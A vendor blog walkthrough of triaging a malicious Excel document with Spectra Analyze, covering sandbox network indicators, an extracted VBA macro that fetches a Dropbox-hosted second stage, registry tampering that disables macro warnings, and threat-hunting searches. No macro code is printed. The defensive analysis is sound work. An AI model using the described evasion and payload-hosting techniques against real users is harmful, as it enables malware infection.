Triaging MalDocs with Spectra Analyze

Executive Summary

• Spectra Analyze’s network indicator analysis features yield insights that are useful in analyzing phishing lures like malicious Microsoft Office documents (MalDocs), and can be used to identify related samples for in-environment threat hunting
• Spectra Core insights can also be leveraged for VBA macro hunting via YARA rules

In our first installment of the RL Spectra Analyze In Action series, I used Spectra Analyze to triage an unknown malware sample. In this example analysis, let’s say a user has opened what they thought was a form from their college admissions office. In reality, this sample is a MalDoc in disguise, complete with a malicious Visual Basic Application (VBA) macro. 

Microsoft Office allows for simple scripting via VBA, and is often used for automation of repetitive tasks. Certain elements of VBA can be exploited for malicious activity, especially API functionality, because these elements can be leveraged to communicate with external applications. This is great for an attacker seeking to abuse this functionality as C2 infrastructure or to download a secondary payload. Because macros are so easy to work with, they provide an approachable attack vector for a would-be threat actor and are commonly seen in the wild.

Here's a walk-through of the network indicator analysis feature of Spectra Analyze, along with Spectra Core’s advanced static analysis features to determine the behavior of the VBA macro.

Figure 1. MalDoc “UT.xls” as viewed by user.

Network Indicator Analysis with RLCS

During the triage process, interacting with a malicious document is a good method for making sure that macros or other content are executed, but it’s important to have a proper analysis environment set up to reduce the risk of infecting yourself. 

To solve this, you open the UT.xls document in Spectra Analyze in an interactive sandbox session with the ReversingLabs Cloud Sandbox (RLCS) – without having to set up an analysis environment of our own. As the name suggests, the option allows you to interact with the sample during the course of its deployment in the sandbox environment. If you do not wish to do so, you can run the session without this option enabled.

Figure 2. RLCS sample submission window with Interactive Analysis mode option.

After submitting the sample for analysis, you review the results of the RLCS session. The RLCS session has revealed a set of IP addresses, which means that during the sample’s runtime, it communicated or otherwise referenced these addresses. These can be seen in the TCP Connections tab under the Network Analysis tab, shown below, in Figure 3. Our next step is to determine exactly what those IPs are and how they're used by the malware.

Figure 3. Three referenced IP addresses as seen in RLCS report.

Clicking each of these IP addresses in the “Destination IP” column will bring us to the IP Analysis view of Spectra Analyze, with details about the IP address in question, shown in Figure 4. For the address 162.125.9.18, you see that the information available shows that this IP revolves to the Dropbox domain. This IP is not malicious on its own, but searching for this IP within your environment can help to narrow down a list of possibly infected endpoints. 

This behavior is also a red flag that this is likely a malicious sample. Dropbox is a cloud storage service commonly used for filesharing. Cloud sharing services like Dropbox are abused by threat actors for hosting and sharing malicious payloads.

Figure 4. IP Analysis of one of the three referenced IP addresses.

Connecting Extracted Network Indicators with VBA Macro Behaviors

Now that we’ve gone through Network Indicator Analysis, here's the triage process shown by delving into macro behavior. Spectra Core extracts file components from a malicious document, making it easy to find and analyze macros. 

You can drill down and view the macro content of UT.xls via the Extracted Files tab of Static Analysis, and filtering by “Text/VBA” format.

Figure 5. VBA Macro as seen in filtered Extracted Files view.

The text preview of the extracted VBA macro (shown below, in Figure 6) reveals a set of payload download URLs that host the next stage of the malware. We can see two URL references to Dropbox, where a .rar file is referenced, indicating that our assumptions were correct. This confirms that, as we suspected after reviewing our network indicator analysis report, this MalDoc is using Dropbox to host a malicious, secondary payload. We now have a combination of IP addresses and URLs that can be used to track down infected endpoints.

Figure 6. Plain text sample preview of the sample’s VBA macro as displayed by Spectra Analyze, Dropbox C2 URLs highlighted

We can turn these network indicator insights into an Advanced Search query for similar files, as shown in Figure 7 below. This search looks for .doc filetypes reaching out to either the Dropbox domain or the Dropbox IP address, as uncovered in Figures 3 and 4. Running this query yields 7 samples within the last year, shown below. Searching for these hashes within our environment would help us ensure there were no other similar attacks against our organization.

Figure 7. Advanced Search results of search developed with our uncovered network indicators.

Analyzing VBA behavior with Static Analysis

Without having to detonate this sample in a sandbox or analysis environment, Spectra Analyze's Static Analysis behavioral indicators can help pin down precisely what the malicious document has done. Below, see how UT.xls has tampered with the registry to hide the malicious activity.

Figure 8. Static Analysis Indicators tab within Spectra Analyze

In these indicators, note the hardcoded strings that the macro is using to tamper with the registry, along with the associated offsets in the files. Specifically, this registry activity disables the warnings that would ordinarily be displayed when opening a Microsoft Office file that runs a macro. You also see registry activity that disables any security settings that would prevent the macro from running. Threat actors often include this behavior in malicious macros so that they are able to run malicious code without tipping off the user that something nefarious is underway. 

You can also see these strings in the text visualization, shown below. You could use these strings to build a YARA rule for threat hunting or detection purposes. (I'll dive into how to write effective YARA rules in a later installment in this series.) 

Now that we know what to look for, we can pull registry indicators from the VBA script that can be used to find infected endpoints.

Figure 9. Plain text sample preview of the sample’s VBA macro as displayed by Spectra Analyze, registry keywords highlighted.

This particular VBA script has been reused in other malicious documents in a campaign from the same adversary. The file relationships tab of Spectra Analyze can be used to find these other documents along with the file indicators needed to search for them within our organization.

In Figure 10, you have found two additional documents which contain this same malicious VBA macro.

Figure 10. Related documents, as viewed in Spectra Analyze relationships tab.

In a more generalized hunt, you could also use the behavioral indicator codes for the Evasion technique to find many more VBA files that exhibit the same behavior and call out to Dropbox. It’s likely that many of these samples are malicious, and we could hunt for these files in our environment to determine there is no further potential compromise outside of the initial MalDoc.

Spectra Core’s indicator codes used in this advanced search correspond to the description of the behavior and can be looked up in the documentation.

Figure 11. Behavioral Indicator Advanced Search, looking for VBA macros that contact the Dropbox domain and exhibit behavior as defined by indicators above.

An example of a generalized hunt can be seen above, in Figure 11. This hunt returns samples that behave similarly to UT.xls, but they are not necessarily of the same campaign or produced by the same threat actor. If you are seeking to use the insights gleaned by our investigation, then limiting our hunting to the specific IOCs seen in a single campaign may not be enough to adequately address the compromise. Other samples behaving similarly may have made it through our defenses, and broadening our investigation will help us to determine whether or not this was the case. If we were to find other similar samples that have breached our defenses, that would be a strong indication that our organizational security posture should be adjusted.

Spectra Analyze is a powerful tool for MalDoc investigations. Features like network indicator analysis and Static Analysis are useful in streamlining investigations like the one featured in this analysis. 

Up Next… 

In the first two installments of this series, we’ve demonstrated how Spectra Analyze can be used to triage both executable malware, and malicious Office files. In our next installment, I'll go deep into YARA for threat hunting, including developing YARA rules and how you can evaluate the quality of publicly available YARA rules.